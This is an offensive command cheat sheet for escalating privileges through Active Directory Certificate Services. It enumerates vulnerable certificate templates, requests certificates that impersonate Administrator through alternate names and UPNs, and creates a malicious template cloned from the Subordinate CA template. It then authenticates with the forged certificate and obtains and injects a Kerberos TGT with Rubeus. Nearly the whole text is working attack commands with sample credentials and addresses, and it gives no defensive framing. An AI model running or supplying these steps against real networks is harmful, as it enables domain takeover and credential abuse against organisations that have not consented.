Certificate Authority (CA)

#Using certutil we can list templates
certutil -v -dstemplate

#Using certify.exe (locally)
.\certify.exe find /vulnerable

#Using certipy (remotely)
python3 certipy find -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128

// Using certipy
python3 certipy req <domain>/<user>:<password>@<ca_server> <ca_name> -template '<vulnerable_template_name>' -alt '<target_user>'

// Using certify.exe
.\certify.exe request /ca:<server>\<ca-name> /template:"vulnerable_template_name>" /altname:"<alt_name>"

Import-Module .\ADCSTemplate.psm1                             
New-ADCSTemplate -DisplayName Incendium -JSON (Export-ADCSTemplate -DisplayName "Subordinate Certification Authority") -publish -Identity "DOMAIN\PKI Admins"

certipy req -username incendium@domain.local -password PASS123 -ca domain-DC01-CA -target dc.domain.local -template Incendium -upn Administrator@domain.local -dns domain.local

certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.1.10 -username 'Administrator' -domain 'domain.local'

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# Request the TGT
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
# if you gave the password for "cert.pfx", you need to specify the password
Rubeus.exe asktgt /user:Administrator /password:password123 /certificate:cert.pfx /ptt
# or output the file
Rubeus.exe asktgt /user:Administrator /certificate:<Thumbprint> /outfile:ticket.kirbi

impacket-ticketConverter ticket.kirbi ticke.ccache